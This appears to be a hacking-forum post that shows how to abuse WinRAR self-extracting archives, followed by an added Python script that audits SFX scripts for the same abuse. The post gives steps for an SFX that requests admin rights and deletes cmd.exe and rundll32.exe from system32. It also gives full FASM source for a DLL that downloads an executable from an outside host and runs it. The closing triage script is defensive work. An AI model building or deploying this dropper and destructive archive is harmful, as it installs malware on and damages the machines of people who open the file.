- [HOT] SFX Package a good virus handler
Saturday, March 24, 2012
Hi guys, I found this, made by the DarkComet coder, and it's awesome. Check it out.
You need:
- Rundll32
- FASM (Flat Assembler)
Now let's be BAD.
For our last example on the very “secure” SFX options in WinRAR, I will show how to wreck an entire machine using nothing but SFX options.
The SFX manager includes two other dangerous functions: Run as administrator and Delete files. Run as administrator makes the SFX request elevation when it starts (the user sees a UAC prompt), so the SFX then runs with full rights on the system; with those rights, Delete files becomes a way to remove files the user could not otherwise touch.
To use this option follow the steps:
- Create a new SFX package and go to SFX options (now you know how to)
- In SFX options go to the Advanced tab and tick the box “Ask for administrator rights” (that is the label back-translated from a French WinRAR; in the English build it is “Request administrative access”)
- Then in the first input, “Delete files”, enter the list of files you want to delete, separated by white space (example: rundll32.exe cmd.exe hello.exe ...)
- Now go back to the General tab and put as extraction path:
Quote:
%SYSTEMDRIVE%\windows\system32\
In the SFX script that WinRAR stores as the archive comment, these two settings are the Path= and Delete= commands, and the program started after extraction is Setup=.
And now you can generate the SFX.
Warning: this is just an example. Don't run it, it could destroy your entire system if you put important files in the delete list.
If you do want to test it, do it in a virtual machine with a snapshot you can roll back to (or a rollback tool such as Time Machine).
Quick summary of what it does:
This example deletes rundll32.exe, cmd.exe and hello.exe from system32 while the SFX runs (WinRAR's Delete command removes them from the destination folder before the archive contents are written).
Note that the Delete files function only works inside the extraction path; that is why I chose system32 as the extraction path, and we have the rights to write there because I force the SFX to be run as administrator (on a UAC-enabled system the user still has to accept the elevation prompt).
That's all.
Quote:
;-------------------------------
; SFX Downloader via RunDLL32
; Snippet by DarkCoderSc
; unremote.org
;
; Build with FASM, then launch from the SFX setup line as:
;   rundll32.exe OURDLL.DLL,dcscdownload
;-------------------------------
format PE GUI 4.0 DLL
entry DllEntryPoint
include 'win32a.inc'

;-- rw
section '.data' data readable writeable
  CMD_OPEN db 'open',0
  url      db 'http://unremote.org/test.exe',0
  output   db 'c:\test.exe',0       ; FASM strings take no escapes, so a single backslash
  errmsg   db 'ERROR',0
  errtitle db '',0
  okmsg    db 'OK',0
  oktitle  db '',0

section '.text' code readable executable

proc DllEntryPoint hinstDLL, fdwReason, lpvReserved
  mov eax,TRUE
  ret
endp

;-- This is the function we call via rundll32 via the SFX arg line.
;-- rundll32 calls it stdcall with (hwnd, hinst, lpszCmdLine, nCmdShow),
;-- so declare the four parameters to keep the stack balanced on return.
proc dcscdownload hwnd, hinst, lpszCmdLine, nCmdShow
  xor eax, eax
  invoke URLDownloadToFile, 0, url, output, 0, NULL   ; download
  cmp eax, 0                                          ; S_OK == 0
  jne enderr
  invoke ShellExecute, 0, CMD_OPEN, output, 0, 0, SW_SHOW ; execute
  jmp endok
enderr:
  invoke MessageBox, 0, errmsg, errtitle, 0
  jmp endpr
endok:
  invoke MessageBox, 0, okmsg, oktitle, 0
endpr:
  ret
endp

;-- Import and export table
section '.idata' import data readable writeable
  library urlmon,'URLMON.DLL',\
          Shell32,'SHELL32.DLL',\
          user,'USER32.DLL'

  import Shell32,\
         ShellExecute,'ShellExecuteA'
  import user,\
         MessageBox,'MessageBoxA'
  import urlmon,\
         URLDownloadToFile,'URLDownloadToFileA'

section '.edata' export data readable
  export 'OURDLL.DLL',\
         dcscdownload,'dcscdownload'

section '.reloc' fixups data discardable
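The combination shown on this page (an SFX that requests elevation, a Path= into the Windows tree, Delete= entries, and a Setup= line that hands control to rundll32 as with the DLL above) is also exactly what a defender should look for in an SFX before letting it run. The following Python script is an added example, not code from the post or from DarkCoderSc: it parses the Command=value lines WinRAR stores as the SFX archive comment, expands %VAR% references against a constructed environment, reads requestedExecutionLevel out of a manifest blob, and grades the result. The sample script, environment and manifest fragment are constructed for the demo, and the list of risky launchers is an assumption.

```python
"""Static triage of a WinRAR SFX script and its module manifest.

Added example, not code from the original post. Parses the 'Command=value'
lines WinRAR keeps as the SFX archive comment, expands %VAR% the way the SFX
module does, and flags the abusive combination described above.
"""
import re

# Assumption: launchers that have no business in an installer's Setup= line.
RISKY_LAUNCHERS = ("rundll32", "cmd.exe", "powershell", "wscript", "cscript",
                   "mshta", "regsvr32")

# Constructed environment standing in for the victim machine's variables.
DEMO_ENV = {"SYSTEMDRIVE": "C:", "SYSTEMROOT": r"C:\Windows",
            "TEMP": r"C:\Users\demo\AppData\Local\Temp"}


def expand_env(path, env):
    """Expand %VAR% references; unknown variables are left as written."""
    return re.sub(r"%([^%]+)%",
                  lambda m: env.get(m.group(1).upper(), m.group(0)), path)


def norm_path(path):
    """Lower-case, backslash-only, no trailing separator, for prefix tests."""
    return path.replace("/", "\\").lower().rstrip("\\")


def is_under(path, root):
    """True if path equals root or lies anywhere below it."""
    return path == root or path.startswith(root + "\\")


def parse_sfx_script(text):
    """Return [(command, value)] for 'Key=value' and bare 'Key' lines.

    Simplification: free text and Text{...} blocks the SFX would display are
    ignored; commands are case-insensitive, so keys are lower-cased.
    """
    cmds = []
    for raw in text.splitlines():
        m = re.match(r"^([A-Za-z]+)\s*(?:=\s*(.*))?$", raw.strip())
        if m:
            cmds.append((m.group(1).lower(), (m.group(2) or "").strip()))
    return cmds


def manifest_execution_level(blob):
    """Read requestedExecutionLevel from RT_MANIFEST XML (plain text in .rsrc)."""
    m = re.search(rb'requestedExecutionLevel[^>]*?level\s*=\s*"([^"]+)"', blob)
    return m.group(1).decode() if m else None


def audit_sfx(script_text, manifest_blob=b"", env=DEMO_ENV):
    """Return [(severity, message)] findings for one SFX script + manifest."""
    findings = []
    cmds = parse_sfx_script(script_text)
    windir = norm_path(env.get("SYSTEMROOT", r"C:\Windows"))

    # Path= is where the SFX extracts (and the only place Delete= can reach).
    paths = [v for k, v in cmds if k == "path"]
    dest = norm_path(expand_env(paths[-1], env)) if paths else None
    in_windir = dest is not None and is_under(dest, windir)
    if in_windir:
        findings.append(("HIGH", f"extraction path resolves inside {windir}: {dest}"))

    # Delete= removes named files from the destination folder before extraction.
    deletes = [v for k, v in cmds if k == "delete"]
    if deletes:
        findings.append(("HIGH" if in_windir else "MEDIUM",
                         "Delete= targets in destination: " + ", ".join(deletes)))

    # Setup=/Presetup= run a program after/before extraction; a LOLBin is a red flag.
    for k, v in cmds:
        if k in ("setup", "presetup"):
            hit = next((l for l in RISKY_LAUNCHERS if l in v.lower()), None)
            if hit:
                findings.append(("HIGH", f"{k}= launches {hit}: {v}"))

    if any(k == "silent" and v in ("1", "2") for k, v in cmds):
        findings.append(("LOW", "Silent= hides the SFX dialogs from the user"))

    if manifest_execution_level(manifest_blob) == "requireAdministrator":
        findings.append(("HIGH", "module manifest requests elevation (requireAdministrator)"))
    return findings


def severity_summary(findings):
    """Highest severity present, or 'CLEAN' when there are no findings."""
    rank = {"HIGH": 3, "MEDIUM": 2, "LOW": 1}
    return max(findings, key=lambda f: rank[f[0]], default=("CLEAN", ""))[0]


# Constructed SFX script mirroring the post's settings (one Delete= per file).
ABUSIVE_SCRIPT = r"""
Path=%SYSTEMDRIVE%\windows\system32\
Delete=rundll32.exe
Delete=cmd.exe
Delete=hello.exe
Setup=rundll32.exe OURDLL.DLL,dcscdownload
Silent=1
"""
# Constructed fragment of an SFX module's RT_MANIFEST resource.
ELEVATED_MANIFEST = (b'<requestedPrivileges><requestedExecutionLevel '
                     b'level="requireAdministrator" uiAccess="false"/></requestedPrivileges>')
# Constructed benign installer script for comparison.
BENIGN_SCRIPT = "Path=%TEMP%\\myapp\nSetup=install.exe\n"

if __name__ == "__main__":
    for sev, msg in audit_sfx(ABUSIVE_SCRIPT, ELEVATED_MANIFEST):
        print(sev, msg)
    print("benign:", severity_summary(audit_sfx(BENIGN_SCRIPT)))
```

Run against the constructed abusive script, the audit reports four HIGH findings and one LOW; the benign installer script produces none. In practice the script text comes from the archive comment of the SFX (WinRAR's comment view, or unrar's comment extraction) and the manifest blob from the RT_MANIFEST resource of the SFX executable itself.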